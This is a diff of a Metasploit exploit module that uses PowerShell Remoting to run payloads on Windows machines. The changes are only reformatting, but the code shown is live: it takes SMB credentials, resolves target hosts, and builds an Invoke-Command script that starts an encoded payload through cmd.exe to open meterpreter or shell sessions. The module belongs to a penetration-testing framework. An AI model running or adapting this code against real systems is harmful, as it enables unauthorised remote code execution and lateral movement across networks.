@@ -9,38 +9,43 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::Powershell
 
   def initialize(info = {})
-    super(update_info(info,
-          'Name'          => 'Powershell Remoting Remote Command Execution',
-          'Description'   => %q{
-            This module uses Powershell Remoting (TCP 47001) to inject payloads on target machines.
+    super(
+      update_info(
+        info,
+        'Name' => 'Powershell Remoting Remote Command Execution',
+        'Description' => %q{
+          This module uses Powershell Remoting (TCP 47001) to inject payloads on target machines.
           If RHOSTS are specified, it will try to resolve the IPs to hostnames, otherwise
           use a HOSTFILE to supply a list of known hostnames.
-          },
-          'License'       => MSF_LICENSE,
-          'Author'        => [ 'Ben Campbell' ],
-          'References'    =>
-            [
-              [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
-              [ 'OSVDB', '3106']
-            ],
-          'DefaultOptions' =>
-              {
-                'EXITFUNC' => 'thread'
-              },
-          'DisclosureDate' => '1999-01-01',
-          'Platform'      => [ 'win' ],
-          'SessionTypes'  => [ 'meterpreter', 'shell' ],
-          'Targets' =>
-          [
-            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
-          ],
-          'DefaultTarget' => 0
-      ))
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Ben Campbell' ],
+        'References' => [
+          [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+          [ 'OSVDB', '3106']
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread'
+        },
+        'DisclosureDate' => '1999-01-01',
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Targets' => [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options([
       OptString.new('SMBUser', [ false, 'The username to authenticate as' ], fallbacks: ['USERNAME']),
       OptString.new('SMBPass', [ false, 'The password for the specified username' ], fallbacks: ['PASSWORD']),
-      OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication' ], fallbacks: ['DOMAIN']),
+      OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ], fallbacks: ['DOMAIN']),
       OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
       OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]),
       # Move this out of advanced
@@ -51,7 +56,8 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options(
       [
         OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60])
-      ])
+      ]
+    )
   end
 
   def exploit
@@ -92,13 +98,13 @@ class MetasploitModule < Msf::Exploit::Local
                               encode_final_payload: true,
                               remove_comspec: true)
 
-    ps = <<EOF
-#{generate_credentials}
-$ResultList=@(#{known_hosts});
-#{ip_list}
-foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
-Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} }
-EOF
+    ps = <<~EOF
+      #{generate_credentials}
+      $ResultList=@(#{known_hosts});
+      #{ip_list}
+      foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
+      Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} }
+    EOF
 
     if datastore['SMBUser']
       ps << " -Credential $creds"
@@ -124,7 +130,7 @@ EOF
     stime = Time.now.to_f
     loop do
       break if session_created? && datastore['ExitOnSession']
-      break if  datastore['ListenerTimeout'].to_i > 0 && (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f)
+      break if datastore['ListenerTimeout'].to_i > 0 && (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f)
 
       Rex.sleep(1)
     end
